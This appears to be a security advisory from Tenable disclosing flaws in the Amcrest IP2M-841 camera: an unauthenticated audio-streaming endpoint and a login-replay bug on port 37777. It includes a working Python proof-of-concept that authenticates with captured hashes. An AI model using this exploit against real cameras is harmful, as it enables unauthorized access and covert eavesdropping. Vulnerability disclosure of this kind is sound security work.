Amcrest IP Camera Multiple Vulnerabilities

Tenable spent some time examining the Amcrest IP2M-841 IP camera. We found the following:

CVE-2019-3948: Unauthenticated Remote Audio Streaming Over HTTP

The camera exposes the HTTP endpoint videotalk. This endpoint allows a remote user to listen to the audio that the camera is currently capturing. This endpoint does not implement any type of authentication. Therefore, any remote unauthenticated attacker that can decode the DHAV format can make a single HTTP request and listen to the camera's audio.

See the linked proof of concept for a full implementation. If the camera is using default settings, the proof of concept's output should be playable via ffplay with the following command:

ffplay -f alaw -ar 8k -ac 1 [poc output]

Login Replay

Like most Dahua devices, the IP2M-841B has a service listening on TCP port 37777. Previously, another researcher had discovered a remote attacker can login to this interface using a captured hash (see: CVE-2017-7927). Dahua appeared to fix this at the time. However, Tenable discovered the Amcrest IP2M-841B was still vulnerable to this attack if the user's password was only 8 characters long. The following script will login using the "admin" and "01testit" hashes and make an authenticated request for the software version.

import argparse
import socket
import struct
import sys

top_parser = argparse.ArgumentParser(description='Login using admin:01testit and get the software version')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

login = ("\xa0\x00\x00\x60\x00\x00\x00\x00" + 
         "\xc4\xa3\xaf\x48\x99\x56\xb6\xb4" + # username hash
         "\x7e\x48\xc4\x86\x90\x98\x54\xf3" + # password hash
         "\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(login)
resp = sock.recv(1024)

if len(resp) != 32:
    print 'What is this?'
    sys.exit(0)

session_id_bin = resp[16:20]

session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
	print "Failed to log in. Response:"
	print resp
	sys.exit(0)

print str(session_id_int[0])

json = '{"id":1,"method":"magicBox.getSoftwareVersion","params":null,"session":' + str(session_id_int[0]) + '}\n\x00'
size = struct.pack("I", len(json))
json_request = "\xf6\x00\x00\x00" + size + '\x01\x00\x00\x00\x00\x00\x00\x00' + size + '\x00\x00\x00\x00' + session_id_bin + '\x00\x00\x00\x00' + json
sock.sendall(json_request)
print sock.recv(1024)

sock.close()